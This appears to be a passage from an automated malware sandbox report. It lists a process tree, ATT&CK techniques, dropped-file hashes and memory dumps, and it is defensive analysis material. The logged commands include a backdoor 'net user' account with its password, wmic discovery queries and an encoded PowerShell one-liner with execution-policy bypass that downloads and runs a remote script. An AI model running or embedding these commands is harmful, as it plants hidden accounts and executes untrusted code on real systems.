3⤵
PID:3808

C:\Windows\System32\cmd.exe
cmd /C net.exe user WgaUtilAcc IUni1mTF
1⤵
- Suspicious use of WriteProcessMemory
PID:2144

C:\Windows\system32\net.exe
net.exe user WgaUtilAcc IUni1mTF
2⤵
- Suspicious use of WriteProcessMemory
PID:188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 user WgaUtilAcc IUni1mTF
3⤵
PID:2664

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
- Suspicious use of WriteProcessMemory
PID:3004

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
2⤵
- Modifies data under HKEY_USERS
PID:2064

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2724

C:\Windows\System32\Wbem\WMIC.exe
wmic CPU get NAME
2⤵
- Modifies data under HKEY_USERS
PID:1240

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2184

C:\Windows\system32\cmd.exe
cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
2⤵
PID:3104

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:1252

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Account Manipulation

T1098

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Remote Desktop Protocol

T1076

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES6D27.tmp
MD5
265781461bd3699d32def7a26bf20ca6

SHA1
fba089c250f1712a5474ef73e562e145d8bb70a1

SHA256
eb78a1266e7a793b274a6cb70c2ad227fd5f680f5f5288698a57f980cb240085

SHA512
47907712aa99a3c6224b3c31d9054b8f374560a4e4d1c72cfce75448cb9d36c1eea61b4430dce2175b956299220954f31a183e9198fddb007b8393983eea5d8f

Download Submit
C:\Users\Admin\AppData\Local\Temp\kuijob3s\kuijob3s.dll
MD5
a9981347d273073186b0845494e154a4

SHA1
fc0cbb5b8532db34198eb41c4ff16bebbb85ba54

SHA256
ba9056f883562b52279660e0936afa214ca6b40a6af0efd64eaee466b057479b

SHA512
83f7dbc80197edcf170d3c766c2eaaebba5be43f9818763493aa90efc02e68c3917b2c67eddb6f5d8ac90399e660a3e58d3b2bfe311d948bf72c98bff1b96a8b

Download Submit
C:\Users\Admin\AppData\Local\Temp\ready.ps1
MD5
3447df88de7128bdc34942334b2fab98

SHA1
519be4e532fc53a7b8fe2ae21c9b7e35f923d3bb

SHA256
9520067abc34ce8a4b7931256e4ca15f889ef61750ca8042f60f826cb6cb2ac9

SHA512
2ccf6c187c3e17918daadd1fc7ca6e7dfaf6b958468a9867cca233e3506906164dfeb6104c8324e09d3058b090eab22417695b001ddb84f3d98562aec05eb78f

Download Submit
C:\Users\Admin\AppData\Local\Temp\resolve-domain.PS1
MD5
7cc73f9b87540e85212f709eafca7ea8

SHA1
3f43a1e1044dfb8d3354f055a5461d265719fa0e

SHA256
7147ad654973c344899b83fc6cf91fcc9ff39a83b5ef5d8521239fd2a37f8df5

SHA512
c47acb6bed89647059b4a9ef052d4414d79697658c8f7d851ff84f3c64f2e7ce9631525db439a1279a8622d2ed74d838cef48fd235701d98d5da6a8c0f83dea3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kuijob3s\CSC4856BA9160684051B4EC1A7082BC632F.TMP
MD5
b0b89925dbbeddc09c6af070ed3b73eb

SHA1
87fb0c632e90495b8e0beb1913db9228f8702e72

SHA256
1a095a8e9ed711a5570eae6eca259a0bcd64a42e75c3bd8bf9a3984c0fb89880

SHA512
2e31c1b2f4f98a51e500bad8eebfb0b001e908374eb9a9afbb8381df3d90d8d1966b5387ad210745fab841f24b8f744b8ebde308717efa59c8604820866e88b3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kuijob3s\kuijob3s.0.cs
MD5
4864fc038c0b4d61f508d402317c6e9a

SHA1
72171db3eea76ecff3f7f173b0de0d277b0fede7

SHA256
0f5273b8fce9bfd95677be80b808119c048086f8e17b2e9f9964ae8971bd5a84

SHA512
9e59e8bee83e783f8054a3ba90910415edacfa63cc19e5ded9d4f21f7c3005ca48c63d85ce8523a5f7d176aa5f8abafc28f824c10dbfb254eed1ce6e5f55bf31

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\kuijob3s\kuijob3s.cmdline
MD5
cf56bdd57ce7b23167c75f86621d309a

SHA1
48a945bd148d833cc5f7b5c8d9e24cc625ebf5e8

SHA256
12d0f2ff7aaadc6fa960ed98cba20b02fb33cd0e790856cbe23cdff10899eab0

SHA512
571e6ab9fd7172eb5906cd227fcc4fbb79449c45c39e537699bb9e8d9127f1eb993ead99d067eeb6cc3060d655d6d411331dfb07d54f594a145759b4caa0c790

Download Submit
\Windows\Branding\mediasrv.png
MD5
590ae32e6e9072e2b0ad71650d787af9

SHA1
0ab159b2b34b3ebcfdef8e9857fcd09605bbb0c7

SHA256
42d111d512d35fc3ae7a82399ee2cb9403836ddc676237c16a73cba14e7e72bc

SHA512
2b89db1d9229c9baa3cee7700609004cb0313d85886b7652500ba0c6ddee3aa80c39ea6e39ad84f3dba4527e202cf639068d26d93a004a25e90e69d14766179b

Download Submit
\Windows\Branding\mediasvc.png
MD5
c4184e993992dc9b9bb7d2b536311f98

SHA1
fa3a97ac00dbdc7db025d40edf8013cc74d2244f

SHA256
81bd39baea5ba98b725f2362f09c41550bb768da73f174ef032e1a6b6318c6f6

SHA512
d10f9f40da51ca5a71fa473d5521d103dfa55e681b72e789627b8406e3b7158a9621a6a233b1dab905823f4335c1aba27fd5d819f61179227b8ede17ba5f4c19

Download Submit
memory/188-234-0x0000000000000000-mapping.dmp

Download
memory/1156-171-0x000001C3BBFE3000-0x000001C3BBFE5000-memory.dmp

Filesize
8KB

Download
memory/1156-191-0x000001C3BBFE6000-0x000001C3BBFE8000-memory.dmp

Filesize
8KB

Download
memory/1156-170-0x000001C3BBFE0000-0x000001C3BBFE2000-memory.dmp

Filesize
8KB

Download
memory/1156-160-0x0000000000000000-mapping.dmp

Download
memory/1240-237-0x0000000000000000-mapping.dmp

Download
memory/1240-232-0x0000000000000000-mapping.dmp

Download
memory/1252-240-0x0000015000530000-0x0000015000532000-memory.dmp

Filesize
8KB

Download
memory/1252-243-0x0000015000538000-0x0000015000539000-memory.dmp

Filesize
4KB

Download
memory/1252-239-0x0000000000000000-mapping.dmp

Download
memory/1252-241-0x0000015000533000-0x0000015000535000-memory.dmp

Filesize
8KB

Download
memory/1252-242-0x0000015000536000-0x0000015000538000-memory.dmp

Filesize
8KB

Download
memory/1832-204-0x000001EAC88E6000-0x000001EAC88E8000-memory.dmp

Filesize
8KB

Download
memory/1832-221-0x0000000000000000-mapping.dmp

Download
memory/1832-200-0x0000000000000000-mapping.dmp

Download
memory/1832-201-0x000001EAC88E0000-0x000001EAC88E2000-memory.dmp

Filesize
8KB

Download
memory/1832-202-0x000001EAC88E3000-0x000001EAC88E5000-memory.dmp

Filesize
8KB

Download
memory/1832-205-0x000001EAC88E8000-0x000001EAC88EA000-memory.dmp

Filesize
8KB

Download
memory/1916-211-0x0000000000000000-mapping.dmp

Download
memory/2064-236-0x0000000000000000-mapping.dmp

Download
memory/2084-212-0x0000000000000000-mapping.dmp

Download
memory/2088-217-0x0000000000000000-mapping.dmp

Download
memory/2104-224-0x0000000000000000-mapping.dmp

Download
memory/2104-231-0x0000000000000000-mapping.dmp

Download
memory/2104-210-0x0000000000000000-mapping.dmp

Download
memory/2144-227-0x0000000000000000-mapping.dmp

Download
memory/2180-244-0x0000000000000000-mapping.dmp

Download
memory/2284-140-0x0000000000000000-mapping.dmp

Download
memory/2284-214-0x0000000000000000-mapping.dmp

Download
memory/2352-218-0x0000000000000000-mapping.dmp

Download
memory/2388-229-0x0000000000000000-mapping.dmp

Download
memory/2528-245-0x0000000000000000-mapping.dmp

Download
memory/2664-216-0x0000000000000000-mapping.dmp

Download
memory/2664-235-0x0000000000000000-mapping.dmp

Download
memory/2724-213-0x0000000000000000-mapping.dmp

Download
memory/2804-230-0x0000000000000000-mapping.dmp

Download
memory/2808-144-0x000001D4F7D70000-0x000001D4F7D71000-memory.dmp

Filesize
4KB

Download
memory/2808-151-0x000001D4F8610000-0x000001D4F8611000-memory.dmp

Filesize
4KB

Download
memory/2808-146-0x000001D4F7DC6000-0x000001D4F7DC8000-memory.dmp

Filesize
8KB

Download
memory/2808-152-0x000001D4F89A0000-0x000001D4F89A1000-memory.dmp

Filesize
4KB

Download
memory/2808-120-0x0000000000000000-mapping.dmp

Download
memory/2808-126-0x000001D4F7D00000-0x000001D4F7D01000-memory.dmp

Filesize
4KB

Download
memory/2808-129-0x000001D4F8130000-0x000001D4F8131000-memory.dmp

Filesize
4KB

Download
memory/2808-130-0x000001D4F7DC0000-0x000001D4F7DC2000-memory.dmp

Filesize
8KB

Download
memory/2808-153-0x000001D4F7DC8000-0x000001D4F7DC9000-memory.dmp

Filesize
4KB

Download
memory/2808-131-0x000001D4F7DC3000-0x000001D4F7DC5000-memory.dmp

Filesize
8KB

Download
memory/3024-208-0x0000027359FA6000-0x0000027359FA8000-memory.dmp

Filesize
8KB

Download
memory/3024-206-0x0000027359FA0000-0x0000027359FA2000-memory.dmp

Filesize
8KB

Download
memory/3024-203-0x0000000000000000-mapping.dmp

Download
memory/3024-207-0x0000027359FA3000-0x0000027359FA5000-memory.dmp

Filesize
8KB

Download
memory/3104-238-0x0000000000000000-mapping.dmp

Download
memory/3796-215-0x0000000000000000-mapping.dmp

Download
memory/3808-233-0x0000000000000000-mapping.dmp

Download
memory/3872-226-0x0000000000000000-mapping.dmp

Download
memory/3896-114-0x000001D77DB50000-0x000001D77DF71000-memory.dmp

Filesize
4.1MB

Download
memory/3896-119-0x000001D77D716000-0x000001D77D717000-memory.dmp

Filesize
4KB

Download
memory/3896-118-0x000001D77D715000-0x000001D77D716000-memory.dmp

Filesize
4KB

Download
memory/3896-117-0x000001D77D713000-0x000001D77D715000-memory.dmp

Filesize
8KB

Download
memory/3896-116-0x000001D77D710000-0x000001D77D712000-memory.dmp

Filesize
8KB

Download
memory/3900-209-0x0000000000000000-mapping.dmp

Download
memory/3908-228-0x0000000000000000-mapping.dmp

Download
memory/3924-220-0x0000000000000000-mapping.dmp

Download
memory/4040-225-0x0000000000000000-mapping.dmp

Download
memory/4052-219-0x0000000000000000-mapping.dmp

Download
memory/4068-137-0x0000000000000000-mapping.dmp

Download